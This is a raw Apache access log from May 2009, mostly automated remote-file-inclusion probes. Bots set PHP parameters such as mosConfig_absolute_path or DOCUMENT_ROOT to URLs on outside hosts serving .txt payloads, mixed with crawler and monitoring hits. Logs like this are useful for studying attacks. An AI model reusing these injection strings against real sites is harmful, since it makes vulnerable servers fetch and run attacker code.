88.84.128.40 - - [12/May/2009:01:04:39 -0400] "GET /logs/error_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:01:04:39 -0400] "GET /logs/access_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
210.118.194.200 - - [12/May/2009:01:04:56 -0400] "GET /logs/access_log.Q109050700///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
210.118.194.200 - - [12/May/2009:01:04:56 -0400] "GET /logs///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
210.118.194.200 - - [12/May/2009:01:04:56 -0400] "GET ///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
147.27.14.31 - - [12/May/2009:01:05:03 -0400] "GET /logs/error_log.Q108102500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
147.27.14.31 - - [12/May/2009:01:05:05 -0400] "GET /logs/error_log.Q108082200/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
147.27.14.31 - - [12/May/2009:01:05:05 -0400] "GET /logs/error_log.Q109021900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
88.84.128.40 - - [12/May/2009:01:05:08 -0400] "GET /logs/error_log.Q108102500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:01:05:09 -0400] "GET /logs/error_log.Q108082200/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:01:05:10 -0400] "GET /logs/error_log.Q109021900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
190.144.44.36 - - [12/May/2009:01:05:14 -0400] "GET /logs/access_log.Q108100900%20%20//skin/zero_vote/error.php?dir=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:01:05:14 -0400] "GET //skin/zero_vote/error.php?dir=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:01:05:15 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:01:07:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.118.194.200 - - [12/May/2009:01:07:22 -0400] "GET /logs/error_log.Q109040300///skin/zero_vote/ask_password.php?dir=http://203.253.145.192/zb41//skin/zero_vote/ruschmasik.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.65"
72.30.142.126 - - [12/May/2009:01:09:15 -0400] "GET /logs/error_log.Q107062000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.17.237.201 - - [12/May/2009:01:11:07 -0400] "GET /logs/access_log.Q108121300/index.php?option=com_smf&Itemid=&topic=&mosConfig_absolute_path=http://minorblunders.com/orca.do?%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.826"
85.17.237.201 - - [12/May/2009:01:11:07 -0400] "GET /logs/index.php?option=com_smf&Itemid=&topic=&mosConfig_absolute_path=http://minorblunders.com/orca.do?%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.826"
85.17.237.201 - - [12/May/2009:01:11:07 -0400] "GET /index.php?option=com_smf&Itemid=&topic=&mosConfig_absolute_path=http://minorblunders.com/orca.do?%0D?? HTTP/1.1" 404 207 "-" "libwww-perl/5.826"
190.144.44.36 - - [12/May/2009:01:11:14 -0400] "GET /logs/access_log.Q108100900//skin/zero_vote/error.php?dir=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:01:11:28 -0400] "GET /logs/access_log.Q108030400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
110.45.144.107 - - [12/May/2009:01:12:09 -0400] "GET /logs/access_log.Q108122500//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
110.45.144.107 - - [12/May/2009:01:12:09 -0400] "GET /logs/access_log.Q108072400//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
110.45.144.107 - - [12/May/2009:01:12:09 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
110.45.144.107 - - [12/May/2009:01:12:09 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:01:12:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.34.167.192 - - [12/May/2009:01:13:02 -0400] "GET /logs/error_log.Q108061700/includes/stats.inc.php?prefix=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.808"
193.34.167.192 - - [12/May/2009:01:13:02 -0400] "GET /includes/stats.inc.php?prefix=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.808"
193.34.167.192 - - [12/May/2009:01:13:02 -0400] "GET /logs/includes/stats.inc.php?prefix=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.808"
66.232.102.70 - - [12/May/2009:01:13:46 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
66.232.102.70 - - [12/May/2009:01:13:46 -0400] "GET /logs/access_log.Q109041200%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
66.232.102.70 - - [12/May/2009:01:13:46 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://flyozoneusa.com/tmp/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
193.34.167.192 - - [12/May/2009:01:14:10 -0400] "GET /logs/error_log.Q108061700/includes/stats.inc.php?prefix=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 246 "-" "libwww-perl/5.808"
193.34.167.192 - - [12/May/2009:01:14:10 -0400] "GET /includes/stats.inc.php?prefix=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.808"
193.34.167.192 - - [12/May/2009:01:14:12 -0400] "GET /logs/includes/stats.inc.php?prefix=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.808"
210.143.109.236 - - [12/May/2009:01:14:36 -0400] "GET /logs/access_log.Q109012900//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.65"
210.143.109.236 - - [12/May/2009:01:14:36 -0400] "GET //administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.65"
210.143.109.236 - - [12/May/2009:01:14:38 -0400] "GET /logs//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.65"
210.143.109.236 - - [12/May/2009:01:14:39 -0400] "GET /logs/access_log.Q108120600//administrator/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.65"
110.45.144.107 - - [12/May/2009:01:15:13 -0400] "GET /logs//phplive/setup/header.php?css_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
110.45.144.107 - - [12/May/2009:01:15:13 -0400] "GET /logs/access_log.Q108122500%20%20//phplive/setup/header.php?css_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
110.45.144.107 - - [12/May/2009:01:15:13 -0400] "GET //phplive/setup/header.php?css_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
72.29.68.196 - - [12/May/2009:01:15:38 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.29.68.196 - - [12/May/2009:01:15:38 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.29.68.196 - - [12/May/2009:01:15:38 -0400] "GET /logs/access_log.Q108122400%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.144.107 - - [12/May/2009:01:15:38 -0400] "GET /logs/access_log.Q109022200%20%20//phplive/setup/header.php?css_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.29.68.196 - - [12/May/2009:01:16:27 -0400] "GET /logs/access_log.Q108082900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:01:17:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.34.167.192 - - [12/May/2009:01:17:44 -0400] "GET /includes/stats.inc.php?prefix=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.808"
110.45.144.107 - - [12/May/2009:01:19:10 -0400] "GET /logs/access_log.Q108072400%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
110.45.144.107 - - [12/May/2009:01:19:10 -0400] "GET /logs/access_log.Q108122500%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:01:20:26 -0400] "GET /logs/access_log.Q108122400%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:01:20:26 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:01:20:26 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.172.126.16 - - [12/May/2009:01:20:56 -0400] "GET /logs/error_log.Q109021900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:01:20:56 -0400] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:01:20:56 -0400] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
190.144.44.36 - - [12/May/2009:01:20:58 -0400] "GET /logs/access_log.Q108082900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.143.109.236 - - [12/May/2009:01:21:05 -0400] "GET /logs/access_log.Q108070500//ashnews.php?pathtoashnews=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
210.143.109.236 - - [12/May/2009:01:21:05 -0400] "GET //ashnews.php?pathtoashnews=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.65"
210.143.109.236 - - [12/May/2009:01:21:05 -0400] "GET /logs//ashnews.php?pathtoashnews=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
88.191.103.144 - - [12/May/2009:01:21:06 -0400] "GET /logs/error_log.Q109021900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:01:21:06 -0400] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:01:21:06 -0400] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.825"
110.45.144.106 - - [12/May/2009:01:21:10 -0400] "GET /logs/access_log.Q108082400/default.php?page=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
110.45.144.106 - - [12/May/2009:01:21:10 -0400] "GET /logs/default.php?page=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
110.45.144.106 - - [12/May/2009:01:21:10 -0400] "GET /default.php?page=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
210.143.109.236 - - [12/May/2009:01:21:11 -0400] "GET /logs/access_log.Q108111600//ashnews.php?pathtoashnews=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
110.45.144.106 - - [12/May/2009:01:21:23 -0400] "GET /logs/access_log.Q108081300/default.php?page=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
147.27.14.31 - - [12/May/2009:01:21:33 -0400] "GET /logs/error_log.Q109021900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
147.27.14.31 - - [12/May/2009:01:21:33 -0400] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
147.27.14.31 - - [12/May/2009:01:21:33 -0400] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.808"
88.84.128.40 - - [12/May/2009:01:21:37 -0400] "GET /logs/error_log.Q109021900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:01:21:37 -0400] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:01:21:37 -0400] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
72.30.142.126 - - [12/May/2009:01:21:41 -0400] "GET /logs/access_log.Q107091800 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [12/May/2009:01:22:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.59.11.66 - - [12/May/2009:01:22:36 -0400] "GET /logs/?sourcedir=http://www.edwinharahap.com/mataair/them/idfx1.txt? HTTP/1.1" 200 1016 "-" "Mozilla/5.0"
212.59.11.66 - - [12/May/2009:01:22:36 -0400] "GET /?sourcedir=http://www.edwinharahap.com/mataair/them/idfx1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
212.59.11.66 - - [12/May/2009:01:22:36 -0400] "GET /logs/access_log.Q108062600/?sourcedir=http://www.edwinharahap.com/mataair/them/idfx1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.18.76.16 - - [12/May/2009:01:22:49 -0400] "GET /logs/error_log.Q109021900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:22:50 -0400] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:22:50 -0400] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
212.59.11.66 - - [12/May/2009:01:23:12 -0400] "GET /logs/error_log.Q108062600/?sourcedir=http://www.edwinharahap.com/mataair/them/idfx1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
69.172.126.16 - - [12/May/2009:01:23:15 -0400] "GET /logs/access_log.Q109021900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
202.21.134.11 - - [12/May/2009:01:23:17 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0054704F7CC049006F5C05I+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
88.191.103.144 - - [12/May/2009:01:23:17 -0400] "GET /logs/access_log.Q109021900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.825"
72.30.142.126 - - [12/May/2009:01:23:37 -0400] "GET /logs/error_log.Q107111900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
147.27.14.31 - - [12/May/2009:01:24:08 -0400] "GET /logs/access_log.Q109021900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
88.84.128.40 - - [12/May/2009:01:24:15 -0400] "GET /logs/access_log.Q109021900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
217.18.76.16 - - [12/May/2009:01:25:21 -0400] "GET /logs/access_log.Q109021900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
66.249.72.114 - - [12/May/2009:01:26:23 -0400] "GET /images/items/store_anesth_section_over.jpg HTTP/1.1" 200 9173 "-" "Googlebot-Image/1.0"
210.143.109.236 - - [12/May/2009:01:26:39 -0400] "GET /logs//ashnews.php?pathtoashnews=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
210.143.109.236 - - [12/May/2009:01:26:39 -0400] "GET //ashnews.php?pathtoashnews=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.65"
72.30.142.126 - - [12/May/2009:01:27:08 -0400] "GET /images/_notes/nav_store_fav_over_r1_c3.jpg.mno HTTP/1.0" 200 210 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [12/May/2009:01:27:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.115.136.12 - - [12/May/2009:01:27:40 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.115.136.12 - - [12/May/2009:01:27:40 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
217.115.136.12 - - [12/May/2009:01:27:40 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:01:28:37 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:01:28:37 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:01:28:37 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
72.29.68.196 - - [12/May/2009:01:28:37 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.29.68.196 - - [12/May/2009:01:28:40 -0400] "GET /logs/access_log.Q108122500//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.160.4.250 - - [12/May/2009:01:28:50 -0400] "GET /?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
217.160.4.250 - - [12/May/2009:01:28:51 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 200 1016 "-" "Mozilla/5.0"
217.160.4.250 - - [12/May/2009:01:28:51 -0400] "GET /logs/access_log.Q108100400/?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:01:28:54 -0400] "GET /logs/access_log.Q107071500 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.70.114 - - [12/May/2009:01:29:22 -0400] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
74.53.70.114 - - [12/May/2009:01:29:22 -0400] "GET /logs/access_log.Q108092600//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.53.70.114 - - [12/May/2009:01:29:22 -0400] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
210.143.109.236 - - [12/May/2009:01:29:30 -0400] "GET /logs/error_log.Q108080800//ashnews.php?pathtoashnews=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
217.160.4.250 - - [12/May/2009:01:29:31 -0400] "GET /logs/access_log.Q108102500/?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
72.30.142.126 - - [12/May/2009:01:29:34 -0400] "GET /logs/error_log.Q108020600 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
85.17.207.218 - - [12/May/2009:01:29:57 -0400] "GET /samplelinksdir.php?path[docroot]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
85.17.207.218 - - [12/May/2009:01:29:57 -0400] "GET /logs/access_log.Q109050700/samplelinksdir.php?path[docroot]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
85.17.207.218 - - [12/May/2009:01:29:57 -0400] "GET /logs/samplelinksdir.php?path[docroot]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
74.53.70.114 - - [12/May/2009:01:30:01 -0400] "GET /logs/access_log.Q108091100//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
